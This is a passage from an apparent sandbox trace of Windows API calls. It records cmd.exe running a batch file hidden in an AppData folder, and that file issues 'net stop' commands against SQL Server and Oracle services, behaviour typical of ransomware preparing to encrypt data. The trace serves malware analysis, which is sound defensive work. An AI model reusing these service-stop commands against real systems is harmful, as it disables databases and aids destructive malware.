HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0212.592] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0212.592] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.592] SetFilePointer (in: hFile=0x78, lDistanceToMove=5193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1449 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0212.592] GetProcessHeap () returned 0x3e0000 [0212.592] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.593] GetProcessHeap () returned 0x3e0000 [0212.593] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.593] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.593] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1449 [0212.593] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x478, lpOverlapped=0x0) returned 1 [0212.593] SetFilePointer (in: hFile=0x78, lDistanceToMove=5226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x146a [0212.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SQLEXPRESS /y\r\nc /y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 33 [0212.593] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.593] GetFileType (hFile=0x78) returned 0x1 [0212.593] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.593] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x146a [0212.593] GetProcessHeap () returned 0x3e0000 [0212.593] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.593] GetProcessHeap () returned 0x3e0000 [0212.593] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.597] _tell (_FileHandle=3) returned 5226 [0212.597] _close (_FileHandle=3) returned 0 [0212.597] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.597] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.597] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.597] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.597] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.597] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.597] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.597] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.597] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.597] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.597] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.597] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.597] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.597] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.597] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.597] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.597] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.597] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.597] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.597] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.598] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.598] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0212.598] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.598] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.598] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.598] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.598] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.598] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.598] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.598] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.598] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.598] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.598] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.598] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.598] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.598] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.598] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.598] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.598] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.598] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0212.598] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.598] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.598] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.598] SetErrorMode (uMode=0x0) returned 0x1 [0212.599] GetProcessHeap () returned 0x3e0000 [0212.599] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.599] GetProcessHeap () returned 0x3e0000 [0212.599] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.599] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.599] GetProcessHeap () returned 0x3e0000 [0212.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.599] GetProcessHeap () returned 0x3e0000 [0212.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.600] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.600] GetProcessHeap () returned 0x3e0000 [0212.600] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.600] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.600] GetProcessHeap () returned 0x3e0000 [0212.600] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.600] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.600] GetProcessHeap () returned 0x3e0000 [0212.600] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.600] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.601] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.601] GetLastError () returned 0x2 [0212.601] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.602] GetLastError () returned 0x2 [0212.602] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.602] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.603] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.603] GetLastError () returned 0x2 [0212.603] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.603] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.604] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.604] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.604] SetErrorMode (uMode=0x0) returned 0x1 [0212.604] GetProcessHeap () returned 0x3e0000 [0212.604] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.604] GetProcessHeap () returned 0x3e0000 [0212.605] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.605] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.605] GetProcessHeap () returned 0x3e0000 [0212.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.605] GetProcessHeap () returned 0x3e0000 [0212.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.605] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.605] GetProcessHeap () returned 0x3e0000 [0212.605] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.605] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.605] GetProcessHeap () returned 0x3e0000 [0212.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.606] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.606] GetProcessHeap () returned 0x3e0000 [0212.606] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.606] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.607] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.607] GetLastError () returned 0x2 [0212.607] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.607] GetLastError () returned 0x2 [0212.608] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.608] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.608] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.609] GetLastError () returned 0x2 [0212.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.609] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.610] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.610] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.610] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.610] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.610] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.610] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SQLEXPRESS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SQLEXPRESS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SQLEXPRESS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x9f8, dwThreadId=0x8c4)) returned 1 [0212.614] CloseHandle (hObject=0x78) returned 1 [0212.614] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.614] GetProcessHeap () returned 0x3e0000 [0212.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.614] GetEnvironmentStringsW () returned 0x3f8408* [0212.614] GetProcessHeap () returned 0x3e0000 [0212.614] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.615] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.615] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0212.751] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.751] CloseHandle (hObject=0x74) returned 1 [0212.751] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.751] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.751] GetProcessHeap () returned 0x3e0000 [0212.751] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.751] GetEnvironmentStringsW () returned 0x3f8408* [0212.751] GetProcessHeap () returned 0x3e0000 [0212.751] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.752] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.752] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.752] GetProcessHeap () returned 0x3e0000 [0212.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.752] GetEnvironmentStringsW () returned 0x3f8408* [0212.752] GetProcessHeap () returned 0x3e0000 [0212.752] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.752] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.752] GetProcessHeap () returned 0x3e0000 [0212.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.752] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.752] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.752] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.752] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.752] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.753] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.753] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.753] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.753] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.753] SetConsoleInputExeNameW () returned 0x1 [0212.753] GetConsoleOutputCP () returned 0x1b5 [0212.753] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.753] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0212.754] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0212.754] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.754] SetFilePointer (in: hFile=0x74, lDistanceToMove=5226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x146a [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.754] GetProcessHeap () returned 0x3e0000 [0212.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0212.755] GetProcessHeap () returned 0x3e0000 [0212.755] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.755] GetProcessHeap () returned 0x3e0000 [0212.755] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.755] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.755] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x146a [0212.755] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x457, lpOverlapped=0x0) returned 1 [0212.755] SetFilePointer (in: hFile=0x74, lDistanceToMove=5259, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x148b [0212.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop OracleClientCache80 /y\r\nc /y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 33 [0212.755] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.755] GetFileType (hFile=0x74) returned 0x1 [0212.756] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.756] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x148b [0212.756] GetProcessHeap () returned 0x3e0000 [0212.756] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.756] GetProcessHeap () returned 0x3e0000 [0212.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.759] _tell (_FileHandle=3) returned 5259 [0212.759] _close (_FileHandle=3) returned 0 [0212.759] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.759] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.759] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.759] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.759] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.759] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.759] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.759] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.759] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.759] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.759] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.760] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.760] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.760] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.760] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.760] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.760] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.760] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.760] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.760] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.760] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.760] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0212.760] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.760] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.760] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.760] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.760] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.760] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.760] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.760] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.760] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.760] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.760] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.760] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.760] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.760] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.760] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.760] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.760] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.760] _wcsicmp 